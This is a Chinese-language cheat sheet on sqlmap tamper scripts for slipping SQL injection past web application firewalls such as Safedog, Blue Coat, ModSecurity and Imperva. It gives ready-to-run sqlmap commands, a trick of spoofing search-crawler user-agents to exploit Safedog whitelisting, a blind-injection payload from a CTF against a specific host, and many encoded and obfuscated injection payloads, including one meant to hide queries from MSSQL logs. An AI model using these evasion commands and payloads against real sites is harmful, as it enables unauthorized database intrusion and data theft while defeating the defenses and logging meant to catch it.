sqlmap针对应用 tamper高级应用

常用语句

  • safedog检测(--tamper "safedog2.py")
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch -r

  • safedog全面检测 加参数:--level 5 --risk 3
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch --level 5 --risk 3 -r

  • safedog全面检测+延时 加参数:
    --delay 2 延时
    --timeout=60 等待连接超时的时间 默认为30秒
    --time-sec=60 响应的延迟时间 默认为5秒
    py -2 sqlmap.py --random-agent --tamper "safedog2.py" --batch --delay 2 --time-sec=60 --timeout=60 --time-sec 60 --level 5 --risk 3 -r

针对于mysql的常用语句

  • 快速检测 --tamper "bluecoat.py"
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch -r

  • 延时+超时
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch --delay 2 --timeout=11 -r

  • 全面sql检测(快速检测 再加--level 5 --risk 3 )bluecoat.py
    py -2 sqlmap.py --random-agent --tamper "bluecoat.py" --dbms Mysql --batch --level 5 --risk 3 -r

加快速度 指定数据库类型:

--dbms Oracle
--dbms Mysql
--dbms "Microsoft Access"

自练注入

  • DVWA练习系统

  • (mysql+php环境) php语句

$sql="SELECT * FROM users WHERE id='$id'LIMIT 0,1"; #只查询1条记录

...

过WAF

安全狗 等。

  • 清除cookies
    抓包后,cookies没有用的话清除cookies,保存数据包为x.txt
    sqlmap里面用-r x.txt

  • --timeout=10 延时

  • --ignore-proxy 忽略系统默认的HTTP代理

  • --delay=2 在每个HTTP请求之间的延迟2秒

  • 随机user-agent
    加参数 --random-agent

  • 指定user-agent
    爬虫机器人的user-agent在安全狗里是白名单!

MSN爬虫
--user-agent "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
雅虎爬虫
--user-agent "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

其它user-agent:
安卓手机
user-agent (来自burp自动替换后抓包的UA)
--user-agent "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"

Tamper

空格被过滤?
1.试试%a0 %0b这些常用的字符不行
2.用()取而代之 达到空格的效果

【华山杯CTF】Web 4.有WAF该怎么注入呢
其他union select都没过滤,但是union一直不出显示位,那就只能试试盲注了
id=1e0and(ascii(substr(database(),1,1))>1)

最开始以为不能跨表,就开始爆破字段,但是爆破了同表只有Name,id两个字段
既然不是同表的字段,那就只能试试跨表了
构造poc如下:
http://218.245.4.113:8080/web04/60c2a013a6decbe0c5c2883080e6b332/index.php?id=1e0and(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))={})'.format(i,d)
这样查出了数据库名、表、字段,最后发现表和字段都是flag.....

for All databases

base64encode.py apostrophemask.py/apostrophenullencode.py

  • Oracle
    greatest.py

  • MSSQL

  • MySQL
    greatest.py
    【仅针对于mysql】bluecoat.py(equaltolike.py+空格变其他空白符)

  • Microsoft SQL Server
    equaltolike.py

  • PostgreSQL
    greatest.py

  • Microsoft Access

替换空格
space2dash.py

搜索 关键字

所有脚本


apostrophemask.py 替换 单引号' 为 %EF%BC%87 (它的UTF-8全角字符,全宽度对应物)


apostrophenullencode.py 替换 单引号' 为 %00%27  (%00%27是 单引号' 的非法 双字节unicode字符,double unicode 等价物)


appendnullbyte.py 在 payload 尾部追加 编码了的 零字节字符 即%00   针对[Access]数据库的WAF

base64encode.py 对给定的payload 的所有字符 使用Base64编码


between.py  用“NOT BETWEEN 0 AND #” 替换大于号>    用“BETWEEN # AND #”替换 等于号=   [mssql oracle mysql postgreSQL]

bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”  [mysql]


charencode.py 对给定payload中的 所有字符 进行 1次 url编码(不处理已经编码过的字符)  [mssql oracle mysql postgreSQL]

chardoubleencode.py 对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)

charunicodeencode.py 对给定的payload的 未编码的字符串 使用Unicode URL编码(不处理已经编码的字符)  [mssql oracle mysql postgreSQL]

concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例

equaltolike.py 用 运算符LIKE 代替 payload中的所有等号符=  此脚本用于bypass 虚弱和定制的(weak and bespoke) WAF(只过滤了 等号 = )


halfversionedmorekeywords.py 在 每个关键字 之前添加mysql版本注释  即3个字符 /*!     [mysql]绕过WAF

greatest.py  实质 用“GREATEST”函数替换大于号“>”  绕过WAF对>的拦截


versionedkeywords.py 用MySQL注释包围每个非函数关键字  如/*!UNION*/  [mysql]


ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例

lowercase.py 用小写值替换每个关键字字符

modsecurityversioned.py 用注释包围完整的查询

modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询

multiplespaces.py 在SQL关键字周围添加多个空格

nonrecursivereplacement.py 用representations替换预定义SQL关键字,适用于过滤器

overlongutf8.py 转换给定的payload当中的所有字符

percentage.py 在每个字符之前添加一个百分号

randomcase.py 随机转换每个关键字字符的大小写

randomcomments.py 向SQL关键字中插入随机注释

securesphere.py 添加经过特殊构造的字符串

sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs

space2comment.py 用“/**/”替换空格符

space2dash.py 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符

space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符

space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符

space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符

space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符

space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符

space2mysqldash.py 用破折号注释符“--”其次是一个换行符替换空格符

space2plus.py 用加号“+”替换空格符

space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符

unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”

unmagicquotes.py 用一个多字节组合 %bf%27 和末尾通用注释一起替换空格符 (宽字符绕过 GPC addslashes)

varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF

versionedmorekeywords.py 用MySQL注释包围每个关键字

xforwardedfor.py 添加一个伪造的HTTP头 “X-Forwarded-For”  随机IP randomIP()  企图绕过WAF

添加一个伪造的 HTTP 头 “X-Forwarded-For” 来绕过 WAF


sqlmap

自动化的SQL注入工具
主要功能是扫描、发现、利用某URL的SQL注入漏洞。

sqlmap支持的数据库

MySQL
Oracle
PostgreSQL
Microsoft SQL Server
Microsoft Access
DB2
SQLite
Firebird
Sybase
SAP MaxDB

SQLMAP采用四种独特的SQL注入技术
盲推理SQL注入
UNION查询SQL注入
堆查询
基于时间的SQL盲注入

其广泛的功能和选项包括:
数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。

通过使用sqlmap中的tamper脚本进行更高效的攻击
下面介绍tamper目录中的大部分插件

针对WAF - 快速应用

1.过滤了等号=

如下数据库可用脚本equaltolike.py
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5

如下数据库可用脚本space2dash.py
MSSQL
SQLite

space2hash.py %23suijizifu%0A

apostrophemask.py

作用: 代替 单引号' 为它的UTF-8全宽度对应物%EF%BC%87
(UTF-8 是使用最广的 一种Unicode的实现方式!)
Example:
1 AND '1'='1
1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

原文件内的说明: (apostrophe character 即 单引号)
Replaces apostrophe character with its UTF-8 full width counterpart

References:
    * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
    * http://lukasz.pilorz.net/testy/unicode_conversion/
    * http://sla.ckers.org/forum/read.php?13,11562,11850
    * http://lukasz.pilorz.net/testy/full_width_utf/index.phps

>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

equaltolike.py

作用:用 LIKE 代替 等号= 此脚本用于bypass weak and bespoke定制的 WAF.(只过滤了 等号 = )
Example:

  • Input: SELECT * FROM users WHERE id=1
  • Output: SELECT * FROM users WHERE id LIKE 1

原文件内的说明:
Replaces all occurances of operator equal ('=') with operator 'LIKE'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the equal character ('=')
    * The LIKE operator is SQL standard. Hence, this tamper script
      should work against all (?) databases

>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'

案例一:http://www.wooyun.org/bugs/wooyun-2010-087296
案例二:http://www.wooyun.org/bugs/wooyun-2010-074790
案例三:http://www.wooyun.org/bugs/wooyun-2010-072489

space2dash.py

作用:绕过过滤等号=
实质是替换空格 为: 注释符号––再紧跟随机字符串 再紧跟一个新行\n
换行(linefeed) 的URL编码值为 %0A 百度百科:URL编码

Example:
'1 AND 9227=9227'
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
拆开语句看实质:替换空格 为 --suijizifu%0A
'1--nVNaVoPYeva%0A
AND--ngNvzqu%0A
9227=9227'

原文件内的说明:
Replaces space character (' ') with a dash comment ('--') followed by
a random string and a new line ('\n')

Requirement:
    * MSSQL
    * SQLite

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ZeroNights SQL injection challenge,
      https://proton.onsec.ru/contest/

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

案例一:http://www.wooyun.org/bugs/wooyun-2010-062878

greatest.py

作用:绕过过滤> 实质用GREATEST替换大于号>
Example:
('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

原文件内的说明:
Replaces greater than operator ('>') with 'GREATEST' counterpart

Tested against:
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the greater than character
    * The GREATEST clause is a widespread SQL command. Hence, this
      tamper script should work against majority of databases

>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

space2hash.py

[针对MySQL 4.0, 5.0]
作用:空格 替换为 #符%23 跟随机字符串 跟换行符%0A
Example:

  • Input: 1 AND 9227=9227
  • Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
    拆开语句看实质: 替换空格 为 %23xxxxx%0A
    1
    %23PTTmJopxdWJ%0A
    AND
    %23cWfcVRPV%0A
    9227=9227
    原文件内的说明:
Replaces space character (' ') with a pound character ('#') followed by
    a random string and a new line ('\n')

    Requirement:
        * MySQL

    Tested against:
        * MySQL 4.0, 5.0

    Notes:
        * Useful to bypass several web application firewalls
        * Used during the ModSecurity SQL injection challenge,
          http://modsecurity.org/demo/challenge.html

    >>> random.seed(0)
    >>> tamper('1 AND 9227=9227')
    '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

apostrophenullencode.py

作用:绕过 过滤单引号' 替换单引号'为%00%27 (%00%27是 单引号' 的非法 double unicode 等价物)
Example:
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
拆开语句看实质:
'1 AND
%00%27
1
%00%27
=
%00%27
1'

原文件内的说明:
Replaces apostrophe character with its illegal double unicode counterpart

>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'

halfversionedmorekeywords.py

作用:每个关键字之前添加mysql版本注释 即3个字符 /*! [mysql]绕过WAF

Example:
"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
拆开语句看实质: 
"value'
/*!0
UNION
/*!0
ALL
/*!0
SELECT
/*!0
CONCAT(
/*!0
CHAR(58,107,112,113,58),
/*!0
IFNULL(CAST(
/*!0
CURRENT_USER()
/*!0
AS
/*!0
CHAR),
/*!0
CHAR(32)),
/*!0
CHAR(58,97,110,121,58)),
/*!0
NULL,
/*!0
NULL#
/*!0
AND 'QDWa'='QDWa"

解释/!语句/ 来自网络
MySQL服务器包含一些其他SQL DBMS中不具备的扩展。
如果在字符“!”后添加了版本号,仅当MySQL的版本>=指定的版本号时才会执行注释中的语法:
CREATE /*!32302 TEMPORARY */ TABLE t (c INT);
这句是说,如果你的版本号为3.23.02或更高,MySQL服务器将使用TEMPORARY关键字。

原文件内的说明:
Adds versioned MySQL comment before each keyword

Requirement:
    * MySQL < 5.1

Tested against:
    * MySQL 4.0.18, 5.0.22

Notes:
    * Useful to bypass several web application firewalls when the
      back-end database management system is MySQL
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

space2morehash.py

作用:空格替换为: #号跟随机字符串再跟换行符%0A
Example:

  • Input: 1 AND 9227=9227
  • Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
    拆开语句看实质:
    1
    %23PTTmJopxdWJ%0A
    AND
    %23cWfcVRPV%0A
    9227=9227

原文件内的说明:
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')

Requirement:
    * MySQL >= 5.1.13

Tested against:
    * MySQL 5.1.41

Notes:
    * Useful to bypass several web application firewalls
    * Used during the ModSecurity SQL injection challenge,
      http://modsecurity.org/demo/challenge.html

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

appendnullbyte.py

作用:在 payload 尾部追加 编码了的 零字节字符 即%00 对Access数据库的WAF。可能有效
Example:
'1 AND 1=1'
'1 AND 1=1%00'

Sql 语句中的注释符:
Access 中没有专门的注释符号(/*/ -- #都没法使用),但可用空字符NULL (URL编码为%00)
如' UNION SELECT Count(
) FROM admin%00

原文件内的说明:
Appends encoded NULL byte character at the end of payload

Requirement:
    * Microsoft Access

Notes:
    * Useful to bypass weak web application firewalls when the back-end
      database management system is Microsoft Access - further uses are
      also possible

Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection

>>> tamper('1 AND 1=1')
'1 AND 1=1%00'

ifnull2ifisnull.py

作用:绕过对 IFNULL 过滤。替换IFNULL(A, B)为IF(ISNULL(A), B, A)
Example:
'IFNULL(1, 2)'
'IF(ISNULL(1),2,1)'

原文件内的说明:
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

Requirement:
    * MySQL
    * SQLite (possibly)
    * SAP MaxDB (possibly)

Tested against:
    * MySQL 5.0 and 5.5

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that filter the IFNULL() function

>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'

space2mssqlblank.py(mssql)

作用:空格替换为随机空符号(从一个有效的 可替换的空字符 组成的集合)

Example:
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'

案例一:
http://www.wooyun.org/bugs/wooyun-2010-062878

原文件内的说明:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Requirement:
    * Microsoft SQL Server

Tested against:
    * Microsoft SQL Server 2000
    * Microsoft SQL Server 2005

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'
"""

# ASCII table:
#   SOH     01      start of heading
#   STX     02      start of text
#   ETX     03      end of text
#   EOT     04      end of transmission
#   ENQ     05      enquiry
#   ACK     06      acknowledge
#   BEL     07      bell
#   BS      08      backspace
#   TAB     09      horizontal tab
#   LF      0A      new line
#   VT      0B      vertical TAB
#   FF      0C      new page
#   CR      0D      carriage return
#   SO      0E      shift out
#   SI      0F      shift in

base64encode.py

作用:用base64编码替换payload字符 Base64 all characters in a given payload

Example: ("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

Requirement: all

案例一:
http://www.wooyun.org/bugs/wooyun-2010-060071
案例
二:http://www.wooyun.org/bugs/wooyun-2010-021062
案例
三:http://www.wooyun.org/bugs/wooyun-2010-043229

space2mssqlhash.py

作用:替换空格 为 #号跟换行\n
实质把 %20 替换为%23%0A

Example:
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

原文件内的说明:
"""
Replaces space character (' ') with a pound character ('#') followed by
a new line ('\n')

Requirement:
    * MSSQL
    * MySQL

Notes:
    * Useful to bypass several web application firewalls

>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
"""

modsecurityversioned.py

作用:(用MySQL版本注释)包含 完整的查询

针对 空格 被过滤

Example:
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'

原文件内的说明:

"""
    Embraces complete query with versioned comment

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    Notes:
        * Useful to bypass ModSecurity WAF/IDS

    >>> import random
    >>> random.seed(0)
    >>> tamper('1 AND 2>1--')
    '1 /*!30874AND 2>1*/--'
"""

space2mysqlblank.py

作用:空格替换为随机空符号(从一个有效的 可替换的空字符 组成的集合)
12345

Example:

  • Input: SELECTid FROMusers
  • Output: SELECT%0Bid%0BFROM%A0users

案例一:
http://www.wooyun.org/bugs/wooyun-2010-076735

原文件内的说明:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Requirement:
    * MySQL

Tested against:
    * MySQL 5.1

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Bid%0DFROM%0Cusers'
"""

# ASCII table:
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return
#   VT      0B      vertical TAB        (MySQL and Microsoft SQL Server only)

between.py

作用:用between替换> < = NOT BETWEEN 0 AND 2 替换掉 > 2

Example:
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'

案例一:
http://www.wooyun.org/bugs/wooyun-2010-068815

原文件内的说明:
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces equals operator ('=') with 'BETWEEN # AND #'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls that
      filter the greater than character
    * The BETWEEN clause is SQL standard. Hence, this tamper script
      should work against all (?) databases

>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
"""

space2mysqldash.py 注:之前有个mssql的 这个是mysql的

作用:替换空格为 一个破折号注释--再跟一个新行\n
实质:空格 变为--\n
Example:
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

原文件内的说明:
"""
Replaces space character (' ') with a dash comment ('--') followed by
a new line ('\n')

Requirement:
    * MySQL
    * MSSQL

Tested against:

Notes:
    * Useful to bypass several web application firewalls.

>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
"""

multiplespaces.py

作用:围绕SQL关键字 添加多个空格
实质:一个空格 变为 多个空格
Example:
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'

案例一:
http://www.wooyun.org/bugs/wooyun-2010-072489

原文件内的说明:
"""
Adds multiple spaces around SQL keywords

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that has poorly written permissive regular expressions

Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1    UNION     SELECT   foobar'

"""

space2plus.py

作用:替换空格为+号
1 Example: ('SELECT id FROM users')
'SELECT+id+FROM+users'

原文件内的说明:
"""
Replaces space character (' ') with plus ('+')

Notes:
    * Is this any useful? The plus get's url-encoded by sqlmap engine
      invalidating the query afterwards
    * This tamper script works against all databases

>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
"""

bluecoat.py

作用:代替SQL statement后面的空格符 为 一个有效的随机空白字符。 然后替换=为like

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'

原文件内的说明:

"""
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator

Requirement:
    * Blue Coat SGOS with WAF activated as documented in
    https://kb.bluecoat.com/index?page=content&id=FAQ2147

Tested against:
    * MySQL 5.1, SGOS

Notes:
    * Useful to bypass Blue Coat's recommended WAF rule configuration

>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
"""

nonrecursivereplacement.py

作用:双重查询语句
针对于 非递归替换(只是一次简单替换sql关键字 的网站程序).
这种程序只会1次替换 如 "SELECT" 为 ""

原文件内的说明:
"""
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace("SELECT", "")) filters

Notes:
    * Useful to bypass very weak custom filters

>>> random.seed(0)
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
"""

space2randomblank.py

作用:替换 空格字符 为一个随机空白符(从一个有效的 可替换的空字符 组成的集合)

>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'

原文件内的说明:
"""
Replaces space character (' ') with a random blank character from a
valid set of alternate characters

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass several web application firewalls

>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
"""

# ASCII table:
#   TAB     09      horizontal TAB
#   LF      0A      new line
#   FF      0C      new page
#   CR      0D      carriage return

sp_password.py

作用:有效载荷的末尾 追加sp_password (for自动模糊处理 from DBMS logs) 从T-SQL记录 隐藏它。

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""

原文件内的说明:
"""
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

Requirement:
    * MSSQL

Notes:
    * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
    * Reference: http://websec.ca/kb/sql_injection

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""

chardoubleencode.py

作用:2次 url编码 所有字符。(不处理已经编码处理过的)

例:如字符A 进行1次url编码 为%41 然后再对百分号再进行url编码(对4和1不编码)得到%2541
%经过1次url编码 为%25

例(实质过程):本脚本不会对%20进行任何编码!
原始语句:SELECT FIELD FROM%20TABLE
先还原为:SELECT FIELD FROM TABLE
经过1次url编码后,再把百分号%全部替换为%25

实例:
SELECT FIELD FROM%20TABLE(这个%20按正常url编码就会被编码为%25%32%30实际上本脚本不对编码过的再编码)
1次url编码(字符串%20不变):%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
把所有百分号替换为%25得到处理结果:%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

原文件内的说明:
"""
Double url-encodes all characters in a given payload (not processing
already encoded)

Notes:
    * Useful to bypass some weak web application firewalls that do not
      double url-decode the request before processing it through their
      ruleset

>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""

unionalltounion.py

作用:替换UNION ALL 为 UNION

原文件内的说明:
"""
Replaces UNION ALL SELECT with UNION SELECT

>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
"""

charencode.py

作用:对载荷中所有字符进行 1次 url编码(不处理已经编码过的)
Example:
'SELECT FIELD FROM%20TABLE'
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

原文件内的说明:

"""
Url-encodes all characters in a given payload (not processing already
encoded)

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass very weak web application firewalls that do not
      url-decode the request before processing it through their ruleset
    * The web server will anyway pass the url-decoded version behind,
      hence it should work against any DBMS

>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""

randomcase.py

作用:替换 每个 (易被拦截的)关键字 的字母为随机大小写

原文件内的说明:

"""
Replaces each keyword character with random case value

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that has poorly written permissive regular expressions
    * This tamper script should work against all (?) databases

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'INseRt'
"""

unmagicquotes.py

反 魔术引号[宽字符绕过 GPC addslashes]
作用:替换单引号'为%bf%27 并在语句尾部加入一般注释-- 以保证语句运行.
原文件内的说明:

"""
Replaces quote character (') with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)

Notes:
    * Useful for bypassing magic_quotes/addslashes feature

Reference:
    * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

>>> tamper("1' AND 1=1")
'1%bf%27-- '
"""

randomcomments.py

作用:sql关键字(中的字母之间) 随机加/**/

原文件内的说明:
"""
Add random comments to SQL keywords

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/N/**/SERT'
"""

charunicodeencode.py

作用:字符串 unicode 编码

案例一:
http://www.wooyun.org/bugs/wooyun-2010-074261

原文件内的说明:
"""
Unicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)

Requirement:
    * ASP
    * ASP.NET

Tested against:
    * Microsoft SQL Server 2000
    * Microsoft SQL Server 2005
    * MySQL 5.1.56
    * PostgreSQL 9.0.3

Notes:
    * Useful to bypass weak web application firewalls that do not
      unicode url-decode the request before processing it through their
      ruleset

>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""

securesphere.py

作用:追加特制的字符串

原文件内的说明:
"""
Appends special crafted string

Notes:
    * Useful for bypassing Imperva SecureSphere WAF
    * Reference: http://seclists.org/fulldisclosure/2011/May/163

>>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
"""

versionedmorekeywords.py

作用:mysql注释绕过 如/!UNION/
仅针对于[mysql]

原文件内的说明:
"""
Encloses each keyword with versioned MySQL comment

Requirement:
    * MySQL >= 5.1.13

Tested against:
    * MySQL 5.1.56, 5.5.11

Notes:
    * Useful to bypass several web application firewalls when the
      back-end database management system is MySQL

>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
"""

space2comment.py

作用:替换空格为/**/

原文件内的说明:
"""
Replaces space character (' ') with comments '/**/'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls

>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""

案例一:http://www.wooyun.org/bugs/wooyun-2010-046496

halfversionedmorekeywords.py

作用:关键字前加 mysql版本注释的前一半 /*!
仅针对于[mysql]

"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

原文件内的说明:
    """
    Adds versioned MySQL comment before each keyword

    Requirement:
        * MySQL < 5.1

    Tested against:
        * MySQL 4.0.18, 5.0.22

    Notes:
        * Useful to bypass several web application firewalls when the
          back-end database management system is MySQL
